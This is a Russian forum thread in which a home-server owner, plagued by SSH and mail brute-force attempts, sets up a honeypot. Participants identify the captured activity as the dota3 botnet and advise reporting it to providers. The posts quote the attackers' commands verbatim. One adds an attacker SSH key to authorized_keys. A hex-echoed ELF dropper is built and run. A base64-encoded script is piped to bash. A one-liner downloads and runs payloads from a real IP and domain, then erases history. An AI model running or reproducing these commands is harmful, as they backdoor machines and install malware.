Фейковый root пользователь для ssh

brute-force, hack, безопасность, домашний сервер

2

1

Можно ли сделать фейковый рут пользователя с паролем 1234 для sshd, но чтобы он ничего не мог делать? И подключившимуся кулхацкеру послание оставить? А то кто-то мне на сервак стучится, хочу с ним поздороваться, поболтать по душам :) Никогда не думал, что на мой homeserver кто-то будет стучатся, пробивать SIP, даже пытаются ломануть ssh ключ (!) с помощью старого diffie-hellman-sha1 подбором!!!! Первый раз такое вижу. Хочу с хацкером поболтать по почте или XMPP :))).

Ссылка

←	Браузер Atom через Firejail + Wine для сбера?

Заблокировать исходящие соединение с IP через firewall-cmd

→

Это роботы, все полностью автоматизировано, времена когда живой хакер ползал по чужой системе давно прошли.

Но honeypot можешь сделать, посмотришь чего тебе туда зальют, скорее всего в /tmp закинут какую-нибудь дрянь, типа шифровальщика или бэкдора.

soomrack ★★★★★
(14.01.23 13:18:55 MSK)

Ответ на: комментарий от soomrack 14.01.23 13:18:55 MSK

А можете ссылку кинуть, как эти honeypotы настраивать? Если что, у меня OpenBSD.

realbarmaley ★★
(14.01.23 13:22:17 MSK) автор топика

Вот такими запросами мой лог забивают :)

bh4.ru 206.189.32.216 - - [14/Jan/2023:00:53:45 +0300] "GET /web/wp-includes/wlwmanifest.xml HTTP/1.1" 404 0
bh4.ru 206.189.32.216 - - [14/Jan/2023:00:53:46 +0300] "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 0
bh4.ru 206.189.32.216 - - [14/Jan/2023:00:53:46 +0300] "GET /website/wp-includes/wlwmanifest.xml HTTP/1.1" 404 0
bh4.ru 206.189.32.216 - - [14/Jan/2023:00:53:46 +0300] "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1" 404 0
bh4.ru 206.189.32.216 - - [14/Jan/2023:00:53:47 +0300] "GET /news/wp-includes/wlwmanifest.xml HTTP/1.1" 404 0

realbarmaley ★★
(14.01.23 13:24:39 MSK) автор топика

Ссылка

Обычно это зараженные устройства дальше стараются расширять ботнет, а не китайский хацкер лично изводится над чьим-то компом.

Если бот сможет войти и рутануться, то скорее всего закинет бинарник в системные либы, а также настройки (часто универсальные и допотопные) в cron-ы и /etc/init.d

NDfan ★
(14.01.23 13:55:08 MSK)

Ссылка

Никто не мешает перенаправить трафик на какую-нибудь заведомо незащищённую виртуалку/контейнер, а там уже и устанавливать связь с этим внеземным разумом )

NDfan ★
(14.01.23 13:58:04 MSK)

Ответ на: комментарий от realbarmaley 14.01.23 13:22:17 MSK

Да никак, настраивай как хочешь. Тут главная проблема это уязвимости твоей системы, ведь были баги которые позволяли выйти и из песочный, и из chroot, и из qemu…

ИМХО, лучше отдельный комп для этого иметь.

soomrack ★★★★★
(14.01.23 14:10:48 MSK)

Ссылка

Ответ на: комментарий от NDfan 14.01.23 13:58:04 MSK

Хорошая идея!

realbarmaley ★★
(14.01.23 14:14:45 MSK) автор топика

Ответ на: комментарий от realbarmaley 14.01.23 14:14:45 MSK

Тогда еще Tripwire настрой.

soomrack ★★★★★
(14.01.23 14:27:48 MSK)

Ответ на: комментарий от soomrack 14.01.23 14:27:48 MSK

В догонку: не знаете, зачем эти боты пытаются по IMAP подключится с пустым юзернеймом?

realbarmaley ★★
(14.01.23 14:47:53 MSK) автор топика

Ответ на: комментарий от realbarmaley 14.01.23 14:47:53 MSK

Понятия не имею. Видимо есть какая-то специфичная уязвимость в некоторых почтовых серверах.

soomrack ★★★★★
(14.01.23 14:50:09 MSK)

Ссылка

Ответ на: комментарий от NDfan 14.01.23 13:58:04 MSK

ух ты, никогда об этом не думал. Звучит как челлендж. Это форвадом в иптаблес перенаправялть на виртуальный интерфейс?

SpaceRanger ★★★
(14.01.23 15:28:56 MSK)

Тут в Иране уже

Chain f2b-exim (1 references) out     source               destination 124.156.223.97       0.0.0.0/0 46.148.40.143        0.0.0.0/0 46.148.40.148        0.0.0.0/0 46.148.40.146        0.0.0.0/0 46.148.40.191        0.0.0.0/0 46.148.40.197        0.0.0.0/0 46.148.40.140        0.0.0.0/0 46.148.40.144        0.0.0.0/0 46.148.40.147        0.0.0.0/0 46.148.40.149        0.0.0.0/0 46.148.40.186        0.0.0.0/0 46.148.40.136        0.0.0.0/0 46.148.40.190        0.0.0.0/0 46.148.40.145        0.0.0.0/0 46.148.40.135        0.0.0.0/0 46.148.40.192        0.0.0.0/0 46.148.40.142        0.0.0.0/0 46.148.40.193        0.0.0.0/0 46.148.40.198        0.0.0.0/0 46.148.40.183        0.0.0.0/0 46.148.40.185        0.0.0.0/0 46.148.40.141        0.0.0.0/0 46.148.40.130        0.0.0.0/0 46.148.40.114        0.0.0.0/0 46.148.40.107        0.0.0.0/0 46.148.40.94         0.0.0.0/0 46.148.40.189        0.0.0.0/0 46.148.40.49         0.0.0.0/0 46.148.40.199        0.0.0.0/0 46.148.40.13         0.0.0.0/0 46.148.40.196        0.0.0.0/0 46.148.40.77         0.0.0.0/0 46.148.40.153        0.0.0.0/0 46.148.40.195        0.0.0.0/0 46.148.40.151        0.0.0.0/0 46.148.40.152        0.0.0.0/0 46.148.40.150        0.0.0.0/0 80.94.95.204         0.0.0.0/0 46.148.40.90         0.0.0.0/0 46.148.40.168        0.0.0.0/0

hbars ★★★★★
(14.01.23 15:32:54 MSK)

Если бы имелась хоть какая-то вероятность, что это живой человек, готовый вступить в диалог, можно было бы в самом деле просто дать ему рута с паролем 1234, предварительно настроив sshd вываливать в stdout сообщение со списком контактов и завершать сессию.

thesis ★★★★★
(14.01.23 15:33:46 MSK)

Ссылка

Не особо задавался вопросом взлома по SSH (всё равно всё на ключах и без депрекейтъд алго), но пришёл к тому, что наружу торчит только wireguard - а он вообще не отвечает на неудачные попытки автентификации (т.е. с неизвестным ключом).

Насчет «связаться» - сканируют всё равно боты, которые не факт, что вообще что-либо логгируют после неуспешного присоединения ломаемого хоста к ботнету (или что там другое ялвяется целью взломщика). Тем более, что многие из них - на зараженых машинах жертв, а тогда отсылать через C&C подробные отчеты о деятельности данного бота тем более затратно и палевно.

Если кто-то знает больше меня про современную ботнетоводческую практику и люто фейспалмит от этих откровений - не стесняйтесь поправить.

Из того, что можно причинить подобным автоматам: есть honeypotы, виртуальные машины, которые намеренно позволяется ему взломать, после чего раскрывается цель и modus operandi бота - что откуда скачивает, куда пытается связаться, в общем всякие полезные сведения с точки зрения выявления и поимки того, кто им управляет. Есть tarpitы, в которых бот застревает, например, в бесконечной попытке авторизироваться - таким образом он не переходит к сканировании других хостов, а киберпреступник теряет время и ресурсы.

token_polyak ★★★★★
(14.01.23 15:44:32 MSK)
Последнее исправление: token_polyak 14.01.23 15:58:49 MSK (всего исправлений: 4)

Ответ на: комментарий от SpaceRanger 14.01.23 15:28:56 MSK

Ага, если для iptables, без сохранения, то наподобие этого:

iptables -t nat -A PREROUTING -d HOST_IP -p tcp -m tcp --dport 22 -j DNAT --to-destination GUEST_IP:22

Конечно, у хоста sshd должен быть на другой порту. И доступен самому админу ))

NDfan ★
(14.01.23 16:31:18 MSK)

Ответ на: комментарий от token_polyak 14.01.23 15:44:32 MSK

https://sites.cs.ucsb.edu/~chris/research/doc/ccs09_botnet.pdf

soomrack ★★★★★
(14.01.23 16:44:47 MSK)

Ссылка

Ответ на: комментарий от NDfan 14.01.23 16:31:18 MSK

Короче завтра виртуалку накачу. Надеюсь это живой человек, или хотя бы при успешном «взломе» он подойдет и посмотрит на результат :)

realbarmaley ★★
(14.01.23 18:09:38 MSK) автор топика

Ссылка

Ответ на: комментарий от hbars 14.01.23 15:32:54 MSK

А можете поподробнее про Иран?

realbarmaley ★★
(14.01.23 21:24:02 MSK) автор топика

Ответ на: комментарий от realbarmaley 14.01.23 21:24:02 MSK

А что там рассказывать. Активно брутфорсят smtp.
подсеть: 46.148.40.0

Регион: Isfahan Isfahan 10 
Город: Shahin Shahr Shahin Shahr 
Координаты: 32.8797 51.5466 
Провайдер ISP: Blue Diamond Network Co., Ltd. PartPayam Shahin Shahr ISP AS15828 Blue Diamond Network Co., Ltd. WCD-AS

hbars ★★★★★
(15.01.23 03:51:12 MSK)

Ссылка

Ответ на: комментарий от realbarmaley 14.01.23 13:22:17 MSK

https://haas.nic.cz/

ValdikSS ★★★★★
(15.01.23 08:12:05 MSK)

Ответ на: комментарий от ValdikSS 15.01.23 08:12:05 MSK

Подключил :) Хацкеры зачем-то такую команду вписывают:

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

realbarmaley ★★
(15.01.23 21:13:27 MSK) автор топика

Ответ на: комментарий от realbarmaley 15.01.23 21:13:27 MSK

Вот еще что вводят:

cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

realbarmaley ★★
(15.01.23 21:40:45 MSK) автор топика

Ответ на: комментарий от realbarmaley 15.01.23 21:40:45 MSK

Оставляют бэкдор для доступа. Это распределенный бизнес. Собранные таким образом компы продадут дальше в ботнет какой-нибудь.

soomrack ★★★★★
(15.01.23 22:46:30 MSK)

Ссылка

Ответ на: комментарий от realbarmaley 15.01.23 21:40:45 MSK

Машина не заражена ботнет-сервисами, только бэкдор?

NDfan ★
(15.01.23 23:55:57 MSK)

Ссылка

Ответ на: комментарий от realbarmaley 15.01.23 21:13:27 MSK

Что за ″lockr″?

mky ★★★★★
(16.01.23 05:41:35 MSK)

Ответ на: комментарий от realbarmaley 15.01.23 21:40:45 MSK

SSH ключ - это IOC, поэтому его можно поискать.

Вот твой бот: https://www.countercraftsec.com/blog/dota3-malware-again-and-again/

ivlad ★★★★★
(16.01.23 06:09:56 MSK)

Ответ на: комментарий от realbarmaley 15.01.23 21:40:45 MSK

Опа, уже бекдор ставят:


22:31:38 	$ cp /bin/echo /home/.z && >/home/.z && cd /home/; rm -rf .i; cp .z .i; cp .i .d; chmod 777 .i; chmod 777 .d; 	
22:31:38 	$ cp /bin/echo /tmp/.z && >/tmp/.z && cd /tmp/; rm -rf .i; cp .z .i; cp .i .d; chmod 777 .i; chmod 777 .d; 	
22:31:38 	$ cp /bin/echo /var/tmp/.z && >/var/tmp/.z && cd /var/tmp/; rm -rf .i; cp .z .i; cp .i .d; chmod 777 .i; chmod 777 .d; 	
22:31:38 	$ cp /bin/echo /home/$USER/.z && >/home/$USER/.z && cd /home/$USER/; rm -rf .i; cp .z .i; cp .i .d; chmod 777 .i; chmod 777 .d; 	
22:31:38 	$ cp /bin/echo /dev/.z && >/dev/.z && cd /dev/; rm -rf .i; cp .z .i; cp .i .d; chmod 777 .i; chmod 777 .d; 	
22:31:38 	$ cp /bin/echo /var/.z && >/var/.z && cd /var/; rm -rf .i; cp .z .i; cp .i .d; chmod 777 .i; chmod 777 .d; 	
22:31:38 	$ cp /bin/echo /etc/.z && >/etc/.z && cd /etc/; rm -rf .i; cp .z .i; cp .i .d; chmod 777 .i; chmod 777 .d; 	
22:31:38 	$ cp /bin/echo /dev/shm/.z && >/dev/shm/.z && cd /dev/shm/; rm -rf .i; cp .z .i; cp .i .d; chmod 777 .i; chmod 777 .d; 	
22:31:38 	$ wget || busybox wget || wd1; curl || busybox curl || cd1; echo -e '\x67\x61\x79\x66\x67\x74'; 	
22:31:38 	$ echo -en '\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x01\x00\x00\x00\x14\x84\x04\x08\x34\x00\x00\x00\x88\x04\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x03\x00\x28\x00\x04\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08\x00\x80\x04\x08\x6d\x04\x00\x00\x6d\x04\x00\x00\x05\x00\x00\x00\x00\x10\x00\x00\x01\x00\x00\x00\x70\x04\x00\x00\x70\x94\x04\x08\x70\x94\x04\x08\x00\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x00\x10\x00\x00\x51\xe5\x74\x64\x00\x00\x00\x00\x00\x00\x00\x00' > .d; echo -e '\x65\x63\x68\x6F\x64\x6F\x6E\x65'; 	
22:31:39 	$ echo -en '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x55\x89\xe5\x8b\x4d\x0c\x53\x8b\x55\x10\x8b\x5d\x08\xeb\x06\x8a\x41\xff\x88\x43\xff\x4a\x43\x41\x83\xfa\xff\x75\xf2\x5b\x5d\xc3\x55\x89\xe5\x8b\x55\x0c\x53\x31\xdb\xeb\x02\x89\xc3\x80\x3c\x13\x00\x8d\x43\x01\x75\xf5\x50\x52\xff\x75\x08\xe8\xc0\xff\xff\xff\x89\xd8\x8b\x5d\xfc\xc9\xc3\x55\x89\xe5\x0f\xb6\x55\x08\x0f\xb6\x45\x0c\x0f\xb6\x4d\x10\xc1\xe2\x18\xc1\xe0\x10\x09\xc2\x0f\xb6\x45\x14\xc1\xe1\x08\x5d\x09\xc2\x09\xd1\x89\xca' >> .d; echo -e '\x65\x63\x68\x6F\x64\x6F\x6E\x65'; 	
22:31:39 	$ echo -en '\x89\xc8\x81\xe2\x00\xff\x00\x00\xc1\xe2\x08\xc1\xe0\x18\x09\xd0\x89\xca\x81\xe1\x00\x00\xff\x00\xc1\xea\x18\xc1\xe9\x08\x09\xca\x09\xd0\xc3\x55\x89\xe5\x83\xec\x10\xff\x75\x08\x6a\x01\xe8\xed\x02\x00\x00\x83\xc4\x10\xc9\xc3\x55\x89\xe5\x83\xec\x10\xff\x75\x08\x6a\x06\xe8\xd8\x02\x00\x00\xc9\xc3\x55\x89\xe5\x83\xec\x08\xff\x75\x10\xff\x75\x0c\xff\x75\x08\x6a\x05\xe8\xc0\x02\x00\x00\xc9\xc3\x55\x89\xe5\x83\xec\x1c\x8b\x45\x08\x89\x45\xf4\x8b\x45\x0c\x89\x45\xf8\x8b\x45\x10\x89\x45\xfc\x8d\x45\xf4\x50\x6a\x03' >> .d; echo -e '\x65\x63\x68\x6F\x64\x6F\x6E\x65'; 	
22:31:39 	$ echo -en '\x6a\x66\xe8\x99\x02\x00\x00\xc9\xc3\x55\x89\xe5\x83\xec\x08\xff\x75\x10\xff\x75\x0c\xff\x75\x08\x6a\x04\xe8\x81\x02\x00\x00\xc9\xc3\x55\x89\xe5\x83\xec\x08\xff\x75\x10\xff\x75\x0c\xff\x75\x08\x6a\x03\xe8\x69\x02\x00\x00\xc9\xc3\x55\x89\xe5\x83\xec\x1c\x8b\x45\x08\x89\x45\xf4\x8b\x45\x0c\x89\x45\xf8\x8b\x45\x10\x89\x45\xfc\x8d\x45\xf4\x50\x6a\x01\x6a\x66\xe8\x42\x02\x00\x00\xc9\xc3\x55\x89\xe5\x57\x56\x53\x81\xec\xec\x00\x00\x00\x68\xcf\x00\x00\x00\x68\xf3\x00\x00\x00\x68\xce\x00\x00\x00\x6a\x6d\x66\xc7\x45' >> .d; echo -e '\x65\x63\x68\x6F\x64\x6F\x6E\x65'; 	
22:31:39 	$ echo -en '\xc0\x02\x00\x66\xc7\x45\xc2\x00\x50\xe8\xcd\xfe\xff\xff\x83\xc4\x0c\x68\xff\x01\x00\x00\x68\x41\x02\x00\x00\xc6\x45\xf1\x69\xc6\x45\xf0\x2e\x89\x45\xc4\x8d\x45\xf0\x50\xc6\x45\xf2\x00\xe8\x17\xff\xff\xff\x83\xc4\x0c\x6a\x00\x6a\x01\x6a\x02\x89\x85\x10\xff\xff\xff\xe8\x72\xff\xff\xff\x83\xc4\x10\x89\x85\x0c\xff\xff\xff\x40\x74\x09\x83\xbd\x10\xff\xff\xff\xff\x75\x0d\x83\xec\x0c\x6a\x01\xe8\xbd\xfe\xff\xff\x83\xc4\x10\x57\x6a\x10\x8d\x45\xc0\x50\xff\xb5\x0c\xff\xff\xff\xe8\xe7\xfe\xff\xff\x83\xc4\x10\x85\xc0' >> .d; echo -e '\x65\x63\x68\x6F\x64\x6F\x6E\x65'; 	
22:31:39 	$ echo -en '\x79\x0e\x83\xec\x0c\xf7\xd8\x50\xe8\x96\xfe\xff\xff\x83\xc4\x10\xc6\x45\xdc\x2f\xb8\x01\x00\x00\x00\xc6\x45\xd3\x20\xc6\x45\xd9\x6e\xc6\x45\xd0\x47\xc6\x45\xd7\x68\xc6\x45\xd2\x54\xc6\x45\xdb\x77\xc6\x45\xd5\x73\xc6\x45\xd1\x45\xc6\x45\xda\x65\xc6\x45\xd4\x2f\xc6\x45\xd6\x73\xc6\x45\xd8\x2f\xc6\x45\xdd\x00\xc6\x45\xe5\x2e\xc6\x45\xde\x20\xc6\x45\xe1\x54\xc6\x45\xe8\x0a\xc6\x45\xe0\x54\xc6\x45\xe4\x31\xc6\x45\xe3\x2f\xc6\x45\xe9\x0d\xc6\x45\xe6\x30\xc6\x45\xea\x0a\xc6\x45\xe7\x0d\xc6\x45\xe2\x50\xc6\x45\xdf' >> .d; echo -e '\x65\x63\x68\x6F\x64\x6F\x6E\x65'; 	
22:31:39 	$ echo -en '\x48\xc6\x44\x05\x9f\x00\x40\x83\xf8\x21\x75\xf5\x31\xff\xc6\x45\xee\x36\xc6\x45\xec\x78\xc6\x45\xed\x38\xc6\x45\xef\x00\xeb\x01\x47\x80\x7c\x2f\xec\x00\x75\xf8\x8d\x45\xd0\x50\x8d\x5d\xa0\x53\xc6\x45\xeb\x00\xe8\x7b\xfd\xff\xff\x8d\x34\x03\x8d\x45\xec\x50\x56\xe8\x6e\xfd\xff\xff\x8d\x55\xde\x52\x8d\x04\x06\x50\x8d\x77\x1a\xe8\x5e\xfd\xff\xff\x89\x34\x24\x53\xff\xb5\x0c\xff\xff\xff\xe8\x24\xfe\xff\xff\x83\xc4\x20\x39\xf0\x74\x0d\x83\xec\x0c\x6a\x03\xe8\xad\xfd\xff\xff\x83\xc4\x10\x31\xdb\x56\x6a\x01\x8d\x45' >> .d; echo -e '\x65\x63\x68\x6F\x64\x6F\x6E\x65'; 	
22:31:39 	$ echo -en '\xf3\x50\xff\xb5\x0c\xff\xff\xff\xe8\x14\xfe\xff\xff\x83\xc4\x10\x48\x74\x0d\x83\xec\x0c\x6a\x04\xe8\x86\xfd\xff\xff\x83\xc4\x10\x0f\xbe\x45\xf3\xc1\xe3\x08\x09\xc3\x81\xfb\x0a\x0d\x0a\x0d\x75\xca\x51\x68\x80\x00\x00\x00\x8d\x9d\x20\xff\xff\xff\x53\xff\xb5\x0c\xff\xff\xff\xe8\xd8\xfd\xff\xff\x83\xc4\x10\x85\xc0\x7e\x13\x52\x50\x53\xff\xb5\x10\xff\xff\xff\xe8\xab\xfd\xff\xff\x83\xc4\x10\xeb\xce\x83\xec\x0c\xff\xb5\x0c\xff\xff\xff\xe8\x47\xfd\xff\xff\x58\xff\xb5\x10\xff\xff\xff\xe8\x3b\xfd\xff\xff\xc7\x04\x24' >> .d; echo -e '\x65\x63\x68\x6F\x64\x6F\x6E\x65'; 	
22:31:39 	$ echo -en '\x05\x00\x00\x00\xe8\x1a\xfd\xff\xff\x83\xc4\x10\x8d\x65\xf4\x5b\x5e\x5f\x5d\xc3\x55\x89\xe5\x5d\xe9\xc3\xfd\xff\xff\x90\x90\x90\x55\x57\x56\x53\x8b\x6c\x24\x2c\x8b\x7c\x24\x28\x8b\x74\x24\x24\x8b\x54\x24\x20\x8b\x4c\x24\x1c\x8b\x5c\x24\x18\x8b\x44\x24\x14\xcd\x80\x5b\x5e\x5f\x5d\x3d\x01\xf0\xff\xff\x0f\x83\x01\x00\x00\x00\xc3\x83\xec\x0c\x89\xc2\xf7\xda\xe8\x09\x00\x00\x00\x89\x10\x83\xc8\xff\x83\xc4\x0c\xc3\xb8\x70\x94\x04\x08\xc3\x00\x00\x00\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74' >> .d; echo -e '\x65\x63\x68\x6F\x64\x6F\x6E\x65'; 	
22:31:40 	$ echo -en '\x00\x2e\x62\x73\x73\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x94\x80\x04\x08\x94\x00\x00\x00\xd9\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x08\x00\x00\x00\x03\x00\x00\x00\x70\x94\x04\x08\x70\x04\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00' >> .d; echo -e '\x65\x63\x68\x6F\x64\x6F\x6E\x65'; 	
22:31:40 	$ echo -en '\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x04\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00' >> .d; echo -e '\x65\x63\x68\x6F\x64\x6F\x6E\x65'; 	
22:31:40 	$ ./.d; ./.i scan.ssh.x86_64; >.i; >.d;

realbarmaley ★★
(16.01.23 07:09:33 MSK) автор топика

Ответ на: комментарий от realbarmaley 16.01.23 07:09:33 MSK

Все по классике:

sleep 15s && cd /var/tmp; echo "IyEvYmluL2Jhc2gKY2QgL3RtcAkKcm0gLXJmIC5zc2gKcm0gLXJmIC5tb3VudGZzCnJtIC1yZiAuWDEzLXVuaXgKcm0gLXJmIC5YMTctdW5peApybSAtcmYgLlgxOS11bml4Cm1rZGlyIC5YMTktdW5peApjZCAuWDE5LXVuaXgKbXYgL3Zhci90bXAvZG90YTMudGFyLmd6IGRvdGEzLnRhci5negp0YXIgeGYgZG90YTMudGFyLmd6CnNsZWVwIDNzICYmIGNkIC90bXAvLlgxOS11bml4Ly5yc3luYy9jCm5vaHVwIC90bXAvLlgxOS11bml4Ly5yc3luYy9jL3RzbSAtdCAxNTAgLVMgNiAtcyA2IC1wIDIyIC1QIDAgLWYgMCAtayAxIC1sIDEgLWkgMCAvdG1wL3VwLnR4dCAxOTIuMTY4ID4+IC9kZXYvbnVsbCAyPjEmCnNsZWVwIDhtICYmIG5vaHVwIC90bXAvLlgxOS11bml4Ly5yc3luYy9jL3RzbSAtdCAxNTAgLVMgNiAtcyA2IC1wIDIyIC1QIDAgLWYgMCAtayAxIC1sIDEgLWkgMCAvdG1wL3VwLnR4dCAxNzIuMTYgPj4gL2Rldi9udWxsIDI+MSYKc2xlZXAgMjBtICYmIGNkIC4uOyAvdG1wLy5YMTktdW5peC8ucnN5bmMvaW5pdGFsbCAyPjEmCmV4aXQgMA==" | base64 --decode | bash

realbarmaley ★★
(16.01.23 07:12:15 MSK) автор топика

Ответ на: комментарий от ivlad 16.01.23 06:09:56 MSK

Точно dota3, я base64 раскодировал, так оно и есть.

realbarmaley ★★
(16.01.23 07:15:00 MSK) автор топика

Ответ на: комментарий от realbarmaley 16.01.23 07:15:00 MSK

Тут имеет смысл посмотреть, откуда они качают dota3.tar.gz и если это не bulletproof hosting, написать им на abuse@. Остальное интересно изучать первых три раза. 😒

ivlad ★★★★★
(16.01.23 07:22:25 MSK)

Ссылка

Ответ на: комментарий от mky 16.01.23 05:41:35 MSK

Что за ″lockr″?

Lockrun - runs cronjobs with overrun protection

soomrack ★★★★★
(16.01.23 12:40:18 MSK)

Ответ на: комментарий от soomrack 16.01.23 12:40:18 MSK

Хакеры пытаются запустить на выполнение каталог ″.ssh″ ?

mky ★★★★★
(16.01.23 13:02:39 MSK)

Ответ на: комментарий от mky 16.01.23 13:02:39 MSK

Не пользую эту утилиту, подозреваю, что эта команда добавляет в cron скрипты из .ssh.

soomrack ★★★★★
(16.01.23 14:39:28 MSK)

Ссылка

Ответ на: комментарий от realbarmaley 16.01.23 07:12:15 MSK

Кто знает, как можно связатся с владельцами этих зараженных компов, если там порты все закрыты?

realbarmaley ★★
(16.01.23 16:30:23 MSK) автор топика

Ответ на: комментарий от realbarmaley 16.01.23 16:30:23 MSK

Провайдеру/хостеру писать, он уже найдет кому там ip принадлежат, если он заинтересован.

soomrack ★★★★★
(16.01.23 16:32:27 MSK)

Ссылка

Ответ на: комментарий от realbarmaley 16.01.23 07:12:15 MSK

А вот, что китайцы присылают:

cd /var/tmp || cd /data/local/tmp/ || cd /tmp/ || cd /var/ || curl -s -L -O 107.182.129.219/x.sh ; wget -q 107.182.129.219/x.sh ; busybox wget http://107.182.129.219/x.sh ; sh x.sh ; rm -rf .* ; rm -rf * ; history -c ; rm -rf ~/.bash_history ; crontab -r ; cd /var/tmp || cd /dev/shm ; mkdir /var/tmp/.update-logs ; cd /var/tmp/.update-logs ; rm -rf .* ; rm -rf * ; wget -q arhivehaceru.com/.x/Update || curl -O -s -L arhivehaceru.com/.x/Update ; wget -q arhivehaceru.com/.x/History || curl -O -s -L arhivehaceru.com/.x/History ; chmod +x * ; ./History ; history -c

realbarmaley ★★
(16.01.23 16:34:06 MSK) автор топика

Ссылка

Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.

←	Браузер Atom через Firejail + Wine для сбера?

Security

Заблокировать исходящие соединение с IP через firewall-cmd

→

Похожие темы